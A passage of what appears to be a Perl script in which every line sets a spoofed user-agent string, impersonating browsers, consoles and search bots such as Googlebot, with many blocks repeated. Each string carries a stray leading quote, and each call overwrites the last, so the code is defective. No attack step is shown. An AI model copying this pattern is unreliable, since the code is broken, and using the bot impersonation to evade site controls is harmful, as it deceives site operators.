  3686. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  3687. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  3688. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  3689. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  3690. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  3691. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  3692. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  3693. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  3694. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  3695. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  3696. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  3697. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  3698. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  3699. $ua->agent("'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620");
  3700. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com");
  3701. $ua->agent("'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)");
  3702. $ua->agent("'Mozilla/4.0 (compatible; Arachmo)");
  3703. $ua->agent("'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)");
  3704. $ua->agent("'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
  3705. $ua->agent("'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
  3706. $ua->agent("'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)");
  3707. $ua->agent("'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)");
  3708. $ua->agent("'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)");
  3709. $ua->agent("'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)");
  3710. $ua->agent("'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)");
  3711. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  3712. $ua->agent("'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )");
  3713. $ua->agent("'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )");
  3714. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)");
  3715. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)");
  3716. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)");
  3717. $ua->agent("'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)");
  3718. $ua->agent("'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)");
  3719. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)");
  3720. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)");
  3721. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  3722. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA");
  3723. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2");
  3724. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1");
  3725. $ua->agent("'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)");
  3726. $ua->agent("'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A");
  3727. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 3.55)");
  3728. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 2.00)");
  3729. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 1.00)");
  3730. $ua->agent("'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0");
  3731. $ua->agent("'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)");
  3732. $ua->agent("'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)");
  3733. $ua->agent("'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)");
  3734. $ua->agent("'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)");
  3735. $ua->agent("'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)");
  3736. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)");
  3737. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ");
  3738. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)");
  3739. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  3740. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)");
  3741. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)");
  3742. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})");
  3743. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))");
  3744. $ua->agent("'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)");
  3745. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51");
  3746. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  3747. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)");
  3748. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)");
  3749. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8");
  3750. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)");
  3751. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  3752. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3753. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3754. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  3755. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  3756. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  3757. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  3758. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  3759. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  3760. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  3761. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  3762. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  3763. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  3764. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  3765. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3766. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  3767. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  3768. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  3769. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  3770. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  3771. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  3772. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  3773. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  3774. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  3775. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  3776. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  3777. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  3778. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  3779. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  3780. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  3781. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  3782. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  3783. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  3784. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  3785. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  3786. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  3787. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  3788. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  3789. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  3790. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  3791. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  3792. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  3793. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  3794. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  3795. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  3796. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  3797. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  3798. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  3799. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  3800. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  3801. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  3802. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  3803. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  3804. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  3805. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  3806. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  3807. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  3808. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  3809. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  3810. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  3811. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)");
  3812. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)");
  3813. $ua->agent("'Googlebot/2.1 (http://www.googlebot.com/bot.html)");
  3814. $ua->agent("'Opera/9.20 (Windows NT 6.0; U; en)");
  3815. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)");
  3816. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)");
  3817. $ua->agent("'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0");
  3818. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16");
  3819. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)");
  3820. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13");
  3821. $ua->agent("'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)");
  3822. $ua->agent("'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  3823. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)");
  3824. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)");
  3825. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)");
  3826. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8");
  3827. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7");
  3828. $ua->agent("'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
  3829. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  3830. $ua->agent("'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)");
  3831. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  3832. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3833. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3834. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  3835. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  3836. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  3837. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  3838. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  3839. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  3840. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  3841. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  3842. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  3843. $ua->agent("'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)");
  3844. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)");
  3845. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  3846. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  3847. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  3848. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  3849. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  3850. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  3851. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  3852. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  3853. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  3854. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  3855. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  3856. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  3857. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  3858. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  3859. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  3860. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  3861. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  3862. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  3863. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  3864. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  3865. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  3866. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  3867. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  3868. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  3869. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  3870. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  3871. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  3872. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  3873. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  3874. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  3875. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  3876. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  3877. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  3878. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  3879. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  3880. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  3881. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  3882. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  3883. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  3884. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
